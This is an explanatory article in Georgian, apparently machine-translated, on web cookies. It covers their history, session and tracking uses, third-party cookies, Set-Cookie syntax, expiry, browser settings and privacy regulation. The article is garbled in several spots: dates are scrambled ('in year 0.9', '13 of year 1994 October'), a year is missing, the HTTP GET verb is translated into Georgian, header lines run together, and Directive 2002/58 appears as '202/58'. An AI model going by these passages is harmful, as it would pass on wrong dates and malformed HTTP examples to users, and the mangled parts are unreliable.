ინტერნეტ ქუქი: რა არის ეს? განმარტება, წარმოშობა, ტიპები და კონფიდენციალურობა

Un ქუქი ან ვებ ქუქი (ან ფუნთუშა, შემოკლებით როგორც მოწმე კვებეკში) განსაზღვრულია HTTP საკომუნიკაციო პროტოკოლით, როგორც ინფორმაციის თანმიმდევრობა, რომელიც გაგზავნილია HTTP სერვერის მიერ HTTP კლიენტისთვის, რომელსაც ეს უკანასკნელი აბრუნებს ყოველ ჯერზე, როცა იგივე HTTP სერვერი იკითხება გარკვეულ პირობებში.

ქუქი არის ა-ის ექვივალენტი ტერმინალზე შენახული მცირე ტექსტური ფაილი ინტერნეტ მომხმარებლის. 20 წელზე მეტი ხნის განმავლობაში არსებული, ისინი ვებსაიტების დეველოპერებს საშუალებას აძლევს შეინახონ მომხმარებლის მონაცემები, რათა ხელი შეუწყონ მათ ნავიგაციას და დაუშვან გარკვეული ფუნქციონალობა. ქუქი-ფაილები ყოველთვის მეტ-ნაკლებად საკამათო იყო, რადგან ისინი შეიცავს ნარჩენ პერსონალურ ინფორმაციას, რომელიც პოტენციურად შეიძლება იყოს გამოყენებული მესამე მხარის მიერ.

ის იგზავნება როგორც HTTP სათაური ვებ სერვერის მიერ ვებ ბრაუზერში, რომელიც მას უცვლელად აბრუნებს სერვერზე წვდომისას. ქუქი-ფაილის გამოყენება შესაძლებელია ავთენტიფიკაცია, სეანსი (სახელმწიფო მოვლა) და ამისთვის შეინახეთ კონკრეტული ინფორმაცია მომხმარებლის შესახებ, როგორიცაა საიტის პრეფერენციები ან ელექტრონული საყიდლების კალათის შინაარსი. ტერმინი ქუქი მომდინარეობს ჯადოსნური ნამცხვარი, ცნობილი კონცეფცია UNIX გამოთვლებში, რომელმაც შთააგონა ბრაუზერის ქუქიების იდეა და სახელი. ქუქიების რამდენიმე ალტერნატივა არსებობს, თითოეულს აქვს საკუთარი გამოყენება, უპირატესობები და უარყოფითი მხარეები.

როგორც მარტივი ტექსტური ფაილები, ქუქიები არ არის შესრულებადი. Ისინი არ არიან არც spyware და არც ვირუსები, თუმცა ზოგიერთი საიტიდან ქუქი-ფაილები აღმოჩენილია მრავალი ანტივირუსული პროგრამული უზრუნველყოფის მიერ, რადგან ისინი საშუალებას აძლევს მომხმარებლებს თვალყური ადევნონ, როდესაც ისინი სტუმრობენ რამდენიმე საიტს. 

თანამედროვე ბრაუზერების უმეტესობა მომხმარებლებს საშუალებას აძლევს გადაწყვიტეთ მიიღოთ თუ უარყოთ ქუქი ფაილები. მომხმარებლებს ასევე შეუძლიათ აირჩიეთ რამდენ ხანს ინახება ქუქიები. თუმცა, ქუქიების სრული უარყოფა ზოგიერთ საიტს გამოუსადეგარს ხდის. მაგალითად, შეინახეთ საყიდლების კალმები ან საიტები, რომლებიც საჭიროებენ შესვლას ავტორიზაციის (მომხმარებლის სახელი და პაროლი) გამოყენებით.

ისტორიული

ტერმინი cookie მომდინარეობს ინგლისური ტერმინიდან ჯადოსნური ნამცხვარი, რომელიც არის მონაცემთა პაკეტი, რომელსაც პროგრამა იღებს და აბრუნებს უცვლელად. Cookies უკვე გამოიყენებოდა IT-ში, როდესაც ლუ მონტული ჰქონდა იდეა მათი გამოყენება ვებ კომუნიკაციებში ივნისში. იმ დროს ის დასაქმებული იყო Netscape Communications-ში, რომელმაც შეიმუშავა ელექტრონული კომერციის აპლიკაცია კლიენტისთვის. Cookies-მა გადაჭრა მაღაზიის ვირტუალური კალათის დანერგვის საიმედოობის პრობლემა.

ჯონ ჯანანდრეამ და ლუ მონტულმა იმავე წელს დაწერეს Netscape-ის პირველი ქუქი-ფაილების სპეციფიკაცია. Mosaic Netscape-ის 0.9 ბეტა ვერსია, გამოშვებული 13 წლის 1994 ოქტომბერს, ინტეგრირებული ქუქიების ტექნოლოგია (იხილეთ პოსტი). ქუქიების პირველი (არაექსპერიმენტული) გამოყენება იყო იმის დადგენა, ეწვივნენ თუ არა Netscape ვებსაიტის ვიზიტორები ადრე საიტს. მონტულმა 1995 წელს შეიტანა განაცხადი ქუქიების ტექნოლოგიაზე და აშშ-ს პატენტი 5774670 მიენიჭა. მინიჭებული 1998 წელს.

0.9 წელს Netscape 1994 ბეტაში დანერგვის შემდეგ, ქუქიების ინტეგრირება მოხდა Internet Explorer 2-ში, რომელიც გამოვიდა 1995 წლის ოქტომბერში.

ქუქი-ფაილების დანერგვა ჯერ კიდევ არ არის ფართოდ ცნობილი საზოგადოებისთვის. კერძოდ, ქუქი-ფაილები მიღებულ იქნა ნაგულისხმევად ბრაუზერის პარამეტრებში და მომხმარებლები არ იყვნენ ინფორმირებული მათი არსებობის შესახებ. ზოგიერთმა ადამიანმა იცოდა ქუქიების არსებობის შესახებ 1995 წლის პირველ კვარტალში, მაგრამ ფართო საზოგადოებამ მხოლოდ მას შემდეგ გაიაზრა, რაც Financial Times-მა გამოაქვეყნა სტატია 12 წლის 1996 თებერვალს. იმავე წელს ქუქი-ფაილებს დიდი ყურადღება მიექცა მედიის ყურადღებას. კონფიდენციალურობის შესაძლო შეჭრის გამო. ქუქიების თემა განიხილებოდა ამერიკის ფედერალური სავაჭრო კომისიის ორ კონსულტაციაზე 1996 და 1997 წლებში.

ქუქიების ოფიციალური სპეციფიკაციის შემუშავება უკვე დაწყებული იყო. ოფიციალური სპეციფიკაციის პირველი განხილვები გაიმართა 1995 წლის აპრილში www-talk დაგზავნის სიაში. შეიქმნა IETF-ის სპეციალური სამუშაო ჯგუფი. ორი ალტერნატიული წინადადება სახელმწიფოს დანერგვისთვის HTTP ტრანზაქციებში შემოგვთავაზეს, შესაბამისად, ბრაიან ბეჰლენდორფმა და დევიდ კრისტოლმა, მაგრამ ჯგუფმა, რომელსაც თავად კრისტოლი ხელმძღვანელობდა, გადაწყვიტა Netscape-ის სპეციფიკაცია გამოეყენებინა, როგორც საწყისი წერტილი. 1996 წლის თებერვალში სამუშაო ჯგუფმა დაადგინა, რომ მესამე მხარის ქუქი-ფაილები მნიშვნელოვანი საფრთხე იყო კონფიდენციალურობისთვის. ჯგუფის მიერ წარმოებული სპეციფიკაცია საბოლოოდ გამოქვეყნდა როგორც RFC 2109.

2014 წლის ბოლოდან ბევრ საიტზე ვხედავთ ქუქიების შესახებ ბანერს. არსებობს მინიმუმ ერთი ბრაუზერის გაფართოება, რომელიც საშუალებას იძლევა ბანერი არ არის ნაჩვენები.

ქუქიების ტიპები და გამოყენება

სესიის მენეჯმენტი

ქუქიების გამოყენება შესაძლებელია მომხმარებლის მონაცემების შესანარჩუნებლად ნავიგაციის დროს, მაგრამ ასევე მრავალჯერადი ვიზიტის დროს. Cookies დაინერგა ელექტრონული საყიდლების კალათების დანერგვის საშუალების უზრუნველსაყოფად, ვირტუალური მოწყობილობა, რომელშიც მომხმარებელს შეუძლია დააგროვოს ის ნივთები, რომელთა შეძენაც სურს საიტის დათვალიერებისას.

დღესდღეობით, აპლიკაციები, როგორიცაა საყიდლების კალმები, სანაცვლოდ ინახავს ელემენტების სიას მონაცემთა ბაზაში სერვერზე, რაც სასურველია; ვიდრე მათი შენახვა თავად ქუქიში. ვებ სერვერი აგზავნის ქუქი-ფაილს, რომელიც შეიცავს უნიკალურ სესიის ID-ს. შემდეგ ვებ ბრაუზერი აბრუნებს ამ სესიის ID-ს ყოველი მომდევნო მოთხოვნისას და კალათაში არსებული ელემენტები ინახება და ასოცირდება იმავე უნიკალურ სესიის ID-თან.

ქუქიების ხშირი გამოყენება სასარგებლოა საიტზე შესვლისთვის რწმუნებათა სიგელების გამოყენებით. მოკლედ, ვებ სერვერი ჯერ აგზავნის ქუქი-ფაილს, რომელიც შეიცავს უნიკალურ სესიის ID-ს. შემდეგ მომხმარებლები უზრუნველყოფენ თავიანთ რწმუნებათა სიგელებს (ჩვეულებრივ მომხმარებლის სახელი და პაროლი). შემდეგ ვებ აპლიკაცია ახდენს სესიის ავთენტიფიკაციას და მომხმარებელს სერვისზე წვდომის საშუალებას აძლევს.

პერსონალიზაციის

ქუქიების გამოყენება შესაძლებელია საიტის მომხმარებლის შესახებ ინფორმაციის დასამახსოვრებლად, რათა მას მომავალში აჩვენოს შესაბამისი შინაარსი. მაგალითად, ვებ სერვერს შეუძლია გამოაგზავნოს ქუქი-ფაილი, რომელიც შეიცავს ბოლო მომხმარებლის სახელს, რომელიც გამოიყენება ამ ვებსაიტზე შესასვლელად, რათა მომხმარებლის სახელი წინასწარ იყოს შევსებული მომავალ ვიზიტებზე.

ბევრი ვებსაიტი იყენებს ქუქი-ფაილებს მომხმარებლის პრეფერენციების საფუძველზე პერსონალიზაციისთვის. მომხმარებლები ირჩევენ თავიანთ პრეფერენციებს ფორმაში და წარუდგენენ მათ სერვერს. სერვერი შიფრავს პრეფერენციებს ქუქიში და აგზავნის მას ბრაუზერში. შემდგომში, ყოველ ჯერზე, როცა მომხმარებელი წვდება ამ საიტის გვერდს, ბრაუზერი აბრუნებს ქუქი-ფაილს და შესაბამისად პრეფერენციების ჩამონათვალს; შემდეგ სერვერს შეუძლია გვერდის მორგება მომხმარებლის პრეფერენციების მიხედვით. მაგალითად, ვიკიპედიის ვებგვერდი თავის მომხმარებლებს საშუალებას აძლევს აირჩიონ მათთვის სასურველი საიტის კანი. Google-ის საძიებო სისტემა საშუალებას აძლევს თავის მომხმარებლებს (თუნდაც ისინი არ არიან დარეგისტრირებულნი) აირჩიონ შედეგების რაოდენობა, რომელთა ნახვა სურთ თითოეულ შედეგების გვერდზე.

თვალთვალი

თვალთვალის ქუქიები გამოიყენება ინტერნეტის მომხმარებლების დათვალიერების ჩვევების თვალყურის დევნებისთვის. ეს ასევე შეიძლება ნაწილობრივ განხორციელდეს კომპიუტერის IP მისამართის გამოყენებით გვერდის მოთხოვნით ან HTTP სათაურის „მიმართვის“ გამოყენებით, რომელსაც კლიენტი აგზავნის ყველა მოთხოვნით, მაგრამ ქუქი-ფაილები იძლევა უფრო მეტ სიზუსტეს. ეს შეიძლება გაკეთდეს როგორც შემდეგ მაგალითში:

1. თუ მომხმარებელი გამოიძახებს გვერდს საიტზე და მოთხოვნა არ შეიცავს ქუქი-ფაილს, სერვერი თვლის, რომ ეს არის მომხმარებლის მიერ მონახულებული პირველი გვერდი. შემდეგ სერვერი ქმნის შემთხვევით სტრიქონს და აგზავნის მას ბრაუზერში მოთხოვნილ გვერდზე.
2. ამ მომენტიდან, ქუქი-ფაილი ავტომატურად გაიგზავნება ბრაუზერის მიერ ყოველ ჯერზე, როდესაც გამოიძახება საიტის ახალი გვერდი. სერვერი ჩვეულ რეჟიმში გაგზავნის გვერდს, მაგრამ ასევე ჩაწერს მოწოდებული გვერდის URL-ს, მოთხოვნის თარიღს, დროს და ქუქი-ფაილს ჟურნალის ფაილში.

ჟურნალის ფაილის დათვალიერებით, შესაძლებელია იმის დანახვა, თუ რომელ გვერდებს ეწვია მომხმარებელი და რა თანმიმდევრობით. მაგალითად, თუ ფაილი შეიცავს id=abc ქუქი-ფაილის გამოყენებით შესრულებულ რამდენიმე მოთხოვნას, ამით შეიძლება დადგინდეს, რომ ყველა ეს მოთხოვნა ერთი და იგივე მომხმარებლისგან მოდის. მოთხოვნილი URL, მოთხოვნებთან დაკავშირებული თარიღი და დრო საშუალებას აძლევს მომხმარებლის დათვალიერების თვალყურის დევნებას.

მესამე მხარის ქუქი-ფაილები და ვებ შუქურები, რომლებიც ქვემოთ არის ახსნილი, დამატებით საშუალებას აძლევს თვალყურის დევნებას სხვადასხვა საიტებზე. ერთი საიტის თვალყურის დევნება ზოგადად გამოიყენება სტატისტიკური მიზნებისთვის. ამის საპირისპიროდ, მესამე მხარის ქუქიების გამოყენებით სხვადასხვა საიტებზე თვალყურის დევნება ჩვეულებრივ გამოიყენება სარეკლამო კომპანიების მიერ მომხმარებლის ანონიმური პროფილების შესაქმნელად (რომლებიც შემდეგ გამოიყენება იმის დასადგენად, თუ რომელი რეკლამა უნდა აჩვენოს მომხმარებელს, ასევე გაუგზავნოს მას ამ რეკლამების შესაბამისი ელ.წერილი - SPAM ).

ქუქიების თვალყურის დევნება წარმოადგენს მომხმარებლის კონფიდენციალურობის შეჭრის რისკს, მაგრამ მათი ადვილად წაშლა შესაძლებელია. თანამედროვე ბრაუზერების უმეტესობა მოიცავს აპის დახურვისას მუდმივი ქუქიების ავტომატურად წაშლის ვარიანტს.

მესამე მხარის ქუქი-ფაილები

სურათები და სხვა ობიექტები, რომლებიც შეიცავს ვებ გვერდზე, შეიძლება განთავსდეს სერვერებზე, რომლებიც განსხვავდებიან გვერდის მასპინძლობისგან. გვერდის საჩვენებლად ბრაუზერი ჩამოტვირთავს ყველა ამ ობიექტს. ვებსაიტების უმეტესობა შეიცავს ინფორმაციას სხვადასხვა წყაროდან. მაგალითად, თუ თქვენს ბრაუზერში აკრიფებთ www.example.com, გვერდის ნაწილზე ხშირად იქნება ობიექტები ან რეკლამები, რომლებიც მოდის სხვადასხვა წყაროდან, ანუ სხვა დომენიდან, ვიდრე www. .example.com. "პირველი" მხარის ქუქიები არის ქუქი ფაილები, რომლებიც დაყენებულია ბრაუზერის მისამართის ზოლში ჩამოთვლილი დომენის მიერ. მესამე მხარის ქუქიების დაყენება ხდება გვერდის ერთ-ერთი ობიექტის მიერ, რომელიც მოდის სხვა დომენიდან.

ნაგულისხმევად, ბრაუზერები, როგორიცაა Mozilla Firefox, Microsoft Internet Explorer და Opera, იღებენ მესამე მხარის ქუქი-ფაილებს, მაგრამ მომხმარებლებს შეუძლიათ შეცვალონ პარამეტრები ბრაუზერის ოფციებში მათი დაბლოკვის მიზნით. არ არსებობს უსაფრთხოების რისკი მესამე მხარის ქუქი-ფაილებს, რომლებიც ააქტიურებენ ვებ ფუნქციებს, თუმცა ისინი ასევე გამოიყენება მომხმარებლების თვალყურის დევნებისთვის. საიტიდან საიტზე.

ინსტრუმენტებს, როგორიცაა Ghostery, ხელმისაწვდომია ყველა ბრაუზერისთვის, Google Chrome-ის ჩათვლით, შეუძლია დაბლოკოს გაცვლა მესამე მხარეებს შორის.

განხორციელება

ქუქიები არის ვებ სერვერის მიერ ბრაუზერში გაგზავნილი მონაცემების მცირე ნაწილი. ბრაუზერი აბრუნებს მათ უცვლელად სერვერზე, შემოაქვს მდგომარეობა (გასული მოვლენების მეხსიერება) სხვაგვარად მოქალაქეობის არმქონე HTTP ტრანზაქციაში. ქუქიების გარეშე, ვებ გვერდის ან ვებ გვერდის კომპონენტის ყოველი მოძიება არის იზოლირებული მოვლენა, დამოუკიდებლად იმავე საიტზე გაკეთებული სხვა მოთხოვნებისგან. ვებ სერვერის მიერ დაყენების შესაძლებლობის გარდა, ქუქიების დაყენება შესაძლებელია აგრეთვე სკრიპტირების ენებით, როგორიცაა JavaScript, თუ ბრაუზერის მიერ არის მხარდაჭერილი და ავტორიზებული.

ქუქიების ოფიციალური სპეციფიკაცია ვარაუდობს, რომ ბრაუზერებს უნდა შეეძლოთ ქუქიების მინიმალური რაოდენობის შენახვა და ხელახლა გაგზავნა. კონკრეტულად, ბრაუზერს უნდა შეეძლოს მინიმუმ 300 ქუქი-ფაილის შენახვა თითო ოთხი კილობაიტიდან და მინიმუმ 20 ქუქი ერთი სერვერისთვის ან დომენისთვის.

3.1 ნაწილის მიხედვით RFC 2965, ქუქი-ფაილების სახელები არ არის რეგისტრირებული.

ქუქი-ფაილს შეუძლია მიუთითოს მისი ვადის გასვლის თარიღი, ამ შემთხვევაში ქუქი წაიშლება ამ თარიღზე. თუ ქუქიში არ არის მითითებული ვადის გასვლის თარიღი, ქუქი-ფაილი წაიშლება როგორც კი მომხმარებელი დატოვებს თავის ბრაუზერს. ამიტომ, ვადის გასვლის თარიღის მითითება არის საშუალება, რომ ქუქი-ფაილი გადარჩეს მრავალი სესიის განმავლობაში. ამ მიზეზით, ქუქი-ფაილები ვარგისიანობის ვადის გასვლის თარიღით ამბობენ, რომ არის მუდმივი. აპლიკაციის მაგალითი: საცალო ვაჭრობის საიტმა შეიძლება გამოიყენოს მუდმივი ქუქიები იმ ნივთების ჩასაწერად, რომლებიც მომხმარებლებმა განათავსეს თავიანთ კალათაში (რეალურად, ქუქი შეიძლება ეხებოდეს გაყიდვის საიტზე მონაცემთა ბაზაში შენახულ ჩანაწერს და არა თქვენს კომპიუტერში) . ამ გზით, თუ მომხმარებლები დატოვებენ ბრაუზერს შესყიდვის გარეშე და მოგვიანებით დაუბრუნდებიან მას, ისინი კვლავ შეძლებენ კალათაში არსებული ნივთების პოვნას. თუ ამ ქუქი ფაილებს ვადის გასვლის თარიღი არ ეწოდა, ისინი იწურება ბრაუზერის დახურვისას და ინფორმაცია კალათის შიგთავსის შესახებ დაიკარგება.

ქუქიების ფარგლები შეიძლება შემოიფარგლოს კონკრეტული დომენით, ქვედომენით ან ბილიკით სერვერზე, რომელმაც შექმნა ისინი.

ქუქი-ფაილის შექმნა

ვებ გვერდების გადატანა ხდება HyperText Transfer Protocol (HTTP) გამოყენებით. ქუქი-ფაილების უგულებელყოფით, ბრაუზერები ურეკავენ გვერდს ვებ სერვერებიდან, როგორც წესი, უგზავნიან მათ მოკლე ტექსტს HTTP მოთხოვნა. მაგალითად, www.example.org/index.html გვერდზე შესასვლელად, ბრაუზერები უკავშირდებიან სერვერს www.example.org და აგზავნიან მოთხოვნას, რომელიც ასე გამოიყურება:

	მიიღეთ /index.html HTTP/1.1ჰოსტი: www.example.org
navigator	→	serveur

სერვერი პასუხობს მოთხოვნილი გვერდის გაგზავნით, რომელსაც წინ უძღვის მსგავსი ტექსტი, მთელი ყოფნის გამოძახება HTTP პასუხი. ეს პაკეტი შეიძლება შეიცავდეს ხაზებს, რომლებიც ბრაუზერს ავალებს შეინახოს ქუქიები:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML გვერდი)
navigator	←	serveur

სერვერი აგზავნის მხოლოდ Set-Cookie ხაზს, თუ სერვერს სურს, რომ ბრაუზერმა შეინახოს ქუქი. Set-Cookie არის მოთხოვნა ბრაუზერისთვის, შეინახოს name=value string და დააბრუნოს იგი ყველა მომავალ მოთხოვნაში სერვერზე. თუ ბრაუზერი მხარს უჭერს ქუქი-ფაილებს და ქუქი-ფაილები ჩართულია ბრაუზერის ვარიანტებში, ქუქი-ფაილი ჩართული იქნება იმავე სერვერზე დაყენებულ ყველა შემდგომ მოთხოვნაში. მაგალითად, ბრაუზერი უწოდებს გვერდს www.example.org/news.html სერვერზე www.example.org შემდეგი მოთხოვნის გაგზავნით:

	მიიღეთ /news.html HTTP/1.1მასპინძელი: www.example.orgCookie: name=valueAccept: */*
navigator	→	serveur

ეს არის იგივე სერვერის სხვა გვერდის მოთხოვნა და განსხვავდება ზემოთ მოყვანილი პირველისგან, რადგან შეიცავს სტრიქონს, რომელიც სერვერმა ადრე გაგზავნა ბრაუზერში. ამ საშუალების წყალობით, სერვერმა იცის, რომ ეს მოთხოვნა დაკავშირებულია წინა მოთხოვნასთან. სერვერი პასუხობს გამოძახებული გვერდის გაგზავნით და ასევე მასში სხვა ქუქიების დამატებით.

ქუქი-ფაილის მნიშვნელობა შეიძლება შეიცვალოს სერვერის მიერ ახალი ხაზის Set-Cookie-ის გაგზავნით: სახელი=new_value გამოძახებული გვერდის საპასუხოდ. შემდეგ ბრაუზერი ცვლის ძველ მნიშვნელობას ახლით.

Set-Cookie ხაზი ჩვეულებრივ იქმნება CGI პროგრამით ან სხვა სკრიპტირების ენით და არა HTTP სერვერის მიერ. HTTP სერვერი (მაგალითად: Apache) ბრაუზერს გადასცემს მხოლოდ პროგრამის შედეგს (დოკუმენტი, რომელსაც წინ უძღვის სათაური, რომელიც შეიცავს ქუქიებს).

ქუქიების დაყენება ასევე შესაძლებელია JavaScript-ით ან სხვა მსგავსი ენებით, რომლებიც გაშვებულია ბრაუზერში, ანუ კლიენტის მხარეს და არა სერვერის მხარეს. JavaScript-ში ამ მიზნით გამოიყენება document.cookie ობიექტი. მაგალითად, განცხადება document.cookie = "temperature=20" ქმნის ქუქი-ფაილს სახელად "temperature" და მნიშვნელობით 20.

ქუქი-ფაილის ატრიბუტები

სახელი/მნიშვნელობის წყვილის გარდა, ქუქი-ფაილი ასევე შეიძლება შეიცავდეს ვადის გასვლის თარიღს, გზას, დომენის სახელს და კავშირის ტიპს, ანუ ნორმალურ ან დაშიფრულს. RFC 2965 ასევე განსაზღვრავს, რომ ქუქიებს უნდა ჰქონდეთ სავალდებულო ვერსიის ნომერი, მაგრამ ეს ჩვეულებრივ გამოტოვებულია. მონაცემთა ეს ნაწილები მიჰყვება name=new_value წყვილს და გამოყოფილია მძიმით. მაგალითად, ქუქი-ფაილების შექმნა შესაძლებელია სერვერის მიერ Set-Cookie ხაზის გაგზავნით: name=new_value; იწურება=თარიღი; გზა=/; domain=.example.org.

ქუქი-ფაილის ვადის გასვლა

ქუქი-ფაილებს ვადა ეწურება და შემდეგ ბრაუზერის მიერ არ იგზავნება სერვერზე შემდეგ სიტუაციებში:

• როდესაც ბრაუზერი დახურულია, თუ ქუქი არ არის მუდმივი.
• როდესაც ქუქი-ფაილის ვადის გასვლის თარიღი ამოიწურება.
• როდესაც ქუქი-ფაილის ვადის გასვლის თარიღი იცვლება (სერვერის ან სკრიპტის მიერ) წარსულში.
• როდესაც ბრაუზერი წაშლის ქუქი-ფაილს მომხმარებლის მოთხოვნით.

მესამე სიტუაცია საშუალებას აძლევს სერვერებს ან სკრიპტებს აშკარად წაშალონ ქუქი. გაითვალისწინეთ, რომ Google Chrome-ის ვებ ბრაუზერში შესაძლებელია იცოდეთ კონკრეტული ქუქი-ფაილის ვადის გასვლის თარიღი კონტენტის პარამეტრებზე წვდომით. კომპიუტერზე შენახული ქუქი შეიძლება დარჩეს იქ რამდენიმე ათეული წლის განმავლობაში, თუ არ განხორციელდება მისი წაშლის პროცედურა.

სტერეოტიპები

ინტერნეტში მათი დანერგვის დღიდან, ქუქიების შესახებ ბევრი იდეა გავრცელდა ინტერნეტში და მედიაში. 1998 წელს CIAC-მა, შეერთებული შტატების ენერგეტიკის დეპარტამენტის კომპიუტერული ინციდენტების მონიტორინგის ჯგუფმა, დაადგინა, რომ ქუქიების უსაფრთხოების ხარვეზები "არსებითად არ არსებობდა" და განმარტა, რომ "ინფორმაცია თქვენი ვიზიტების წარმოშობისა და თქვენ მიერ მონახულებული ვებ გვერდების დეტალების შესახებ. უკვე არსებობს ვებ სერვერების ჟურნალის ფაილებში“. 2005 წელს Jupiter Research-მა გამოაქვეყნა კვლევის შედეგები, რომელშიც რესპონდენტთა მნიშვნელოვანმა პროცენტმა გაითვალისწინა შემდეგი განცხადებები:

• ქუქიები ჰგავს ვირუსი, ისინი აინფიცირებენ მომხმარებლების მყარ დისკებს.
• ქუქიების გენერირება pop-up.
• გასაგზავნად გამოიყენება ქუქიები spam.
• ქუქი-ფაილები გამოიყენება მხოლოდ რეკლამისთვის.

ქუქი ფაილებს არ შეუძლიათ ინფორმაციის წაშლა ან წაკითხვა მომხმარებლის კომპიუტერიდან. თუმცა, ქუქიები შესაძლებელს ხდის მომხმარებლის მიერ მონახულებული ვებგვერდების აღმოჩენას მოცემულ საიტზე ან საიტებზე. ეს ინფორმაცია შეიძლება შეგროვდეს მომხმარებლის პროფილში, რომელიც შეიძლება გამოყენებულ იქნას ან გადაყიდოს მესამე მხარეებზე, რამაც შეიძლება გამოიწვიოს კონფიდენციალურობის სერიოზული პრობლემები. ზოგიერთი პროფილი ანონიმურია, იმ გაგებით, რომ ისინი არ შეიცავს პერსონალურ ინფორმაციას, მაგრამ ასეთი პროფილებიც კი შეიძლება იყოს საეჭვო.

ამავე კვლევის მიხედვით, ინტერნეტის მომხმარებელთა დიდმა პროცენტმა არ იცის როგორ წაშალოს ქუქიები. ერთ-ერთი მიზეზი, რის გამოც ადამიანები არ ენდობიან ქუქი ფაილებს, არის ის, რომ ზოგიერთმა საიტმა ბოროტად გამოიყენა ქუქიების პერსონალური იდენტიფიკაციის ასპექტი და გაუზიარა ეს ინფორმაცია სხვა წყაროებს. მიზნობრივი რეკლამის და არასასურველი ელფოსტის დიდი პროცენტი, რომელიც ითვლება სპამად, მოდის ქუქი-ფაილების თვალთვალის შედეგად მიღებული ინფორმაციადან.

ბრაუზერის პარამეტრები

ბრაუზერების უმეტესობა მხარს უჭერს ქუქი-ფაილებს და საშუალებას აძლევს მომხმარებელს გამორთოს ისინი. ყველაზე გავრცელებული ვარიანტებია:

• მთლიანად ჩართეთ ან გამორთეთ ქუქი-ფაილები, რათა ისინი მუდმივად იყოს მიღებული ან დაბლოკილი.
• მიეცით საშუალება მომხმარებელს ნახოს აქტიური ქუქიები მოცემულ გვერდზე, ბრაუზერის მისამართის ზოლში Javascript: alert(document.cookie) შეყვანით. ზოგიერთი ბრაუზერი შეიცავს ქუქიების მენეჯერს მომხმარებლისთვის, რომელსაც შეუძლია ბრაუზერის მიერ ამჟამად შენახული ქუქიების ნახვა და შერჩევითად წაშლა.

ბრაუზერების უმეტესობა ასევე იძლევა პერსონალური მონაცემების სრულ წაშლას, რომელიც მოიცავს ქუქიებს. ასევე არსებობს დამატებითი მოდულები ქუქიების ნებართვების გასაკონტროლებლად.

კონფიდენციალურობა და მესამე მხარის ქუქი-ფაილები

ამ ფიქტიურ მაგალითში, სარეკლამო კომპანიამ განათავსა ბანერები ორ ვებსაიტზე. თავის სერვერებზე ბანერების განთავსებით და მესამე მხარის ქუქიების გამოყენებით, სარეკლამო კომპანიას შეუძლია თვალყური ადევნოს მომხმარებლის ნავიგაციას ამ ორი საიტის მეშვეობით.

ქუქი-ფაილებს მნიშვნელოვანი გავლენა აქვთ ვებ-მომხმარებლების კონფიდენციალურობასა და ანონიმურობაზე. მიუხედავად იმისა, რომ ქუქი-ფაილები იგზავნება მხოლოდ სერვერზე, რომელმაც დააყენა ისინი ან სერვერზე, რომელიც ეკუთვნის იმავე ინტერნეტ დომენს, ვებგვერდი შეიძლება შეიცავდეს სურათებს ან სხვა კომპონენტებს, რომლებიც შენახულია სხვა დომენების კუთვნილ სერვერებზე. ქუქი-ფაილებს, რომლებიც დაყენებულია ამ გარე კომპონენტების აღდგენის დროს, ე.წ მესამე მხარის ქუქი-ფაილები. ეს მოიცავს ქუქი-ფაილებს არასასურველი ამომხტარი ფანჯრებიდან.

სარეკლამო კომპანიები იყენებენ მესამე მხარის ქუქი-ფაილებს, რათა თვალყური ადევნონ მომხმარებლებს მათ მიერ მონახულებულ სხვადასხვა საიტებზე. კერძოდ, სარეკლამო კომპანიას შეუძლია მომხმარებლის თვალყურის დევნება ყველა გვერდზე, სადაც განთავსებულია სარეკლამო სურათები ან თვალთვალის პიქსელი. მომხმარებლის მიერ მონახულებული გვერდების ცოდნა სარეკლამო კომპანიას საშუალებას აძლევს მიზნად ისახოს მომხმარებლის სარეკლამო პრეფერენციები.

მომხმარებლის პროფილის შექმნის შესაძლებლობას ზოგიერთი მიიჩნევს კონფიდენციალურობის შეჭრად, განსაკუთრებით მაშინ, როდესაც თვალყურის დევნება ხდება სხვადასხვა დომენში მესამე მხარის ქუქიების გამოყენებით. ამ მიზეზით, ზოგიერთ ქვეყანას აქვს ქუქიების კანონმდებლობა.

შეერთებული შტატების მთავრობამ მკაცრი წესები დააწესა ქუქი-ფაილების განთავსების შესახებ 2000 წელს, მას შემდეგ რაც გაირკვა, რომ თეთრი სახლის ნარკომანიის პოლიტიკის ოფისი იყენებდა ქუქი-ფაილებს, რათა თვალყური ადევნოდა მომხმარებელთა კომპიუტერებს, რომლებიც ათვალიერებდნენ ნარკოტიკების ონლაინ რეკლამას. 2002 წელს, კონფიდენციალურობის დაცვის აქტივისტმა დანიელ ბრანდტმა აღმოაჩინა, რომ CIA ტოვებდა მუდმივ ქუქი-ფაილებს კომპიუტერებზე, რომლებიც ეწვივნენ მის ვებგვერდებს. როგორც კი შეიტყო ამ დარღვევის შესახებ, CIA-მ განაცხადა, რომ ეს ქუქი ფაილები განზრახ არ იყო გაგზავნილი და შეწყვიტა მათი დაყენება. 25 წლის 2005 დეკემბერს, ბრანდტმა აღმოაჩინა, რომ ეროვნული უსაფრთხოების სააგენტომ (NSA) დატოვა ორი მუდმივი ქუქი-ფაილი ვიზიტორთა კომპიუტერებზე პროგრამული განახლების გამო. შეტყობინების მიღების შემდეგ, NSA-მ დაუყოვნებლივ გააუქმა ქუქი-ფაილები.

გაერთიანებულ სამეფოში, ქუქიების კანონი “, რომელიც ძალაში შევიდა 25 წლის 2012 მაისს, ავალდებულებს საიტებს გამოაცხადონ თავიანთი განზრახვები, რითაც მომხმარებლებს საშუალებას აძლევს აირჩიონ, სურთ თუ არა დატოვონ კვალი ინტერნეტში მათი გავლის შესახებ. ამრიგად, ისინი შეიძლება იყოს დაცული სარეკლამო მიზნებისგან. თუმცა, მიხედვით The Guardian, ინტერნეტის მომხმარებელთა თანხმობა სულაც არ არის აშკარა; ცვლილებები განხორციელდა მომხმარებლის თანხმობის პირობებში, რაც ხდება რითაც იგულისხმება.

დირექტივა 2002/58 კონფიდენციალურობის შესახებ

დირექტივა 202/58 კონფიდენციალურობისა და ელექტრონული კომუნიკაციების შესახებ, შეიცავს წესებს ქუქიების გამოყენების შესახებ. კერძოდ, ამ დირექტივის მე-5 მუხლის მე-3 პუნქტი მოითხოვს, რომ მონაცემების (როგორიცაა ქუქიების) შენახვა მომხმარებლის კომპიუტერში შეიძლება განხორციელდეს მხოლოდ იმ შემთხვევაში, თუ:

• მომხმარებელი ინფორმირებულია, თუ როგორ გამოიყენება მონაცემები;
• მომხმარებელს ეძლევა შესაძლებლობა უარი თქვას შენახვის ამ ოპერაციაზე. თუმცა, ამ მუხლში ასევე ნათქვამია, რომ ტექნიკური მიზეზების გამო მონაცემების შენახვა თავისუფლდება ამ კანონისაგან.

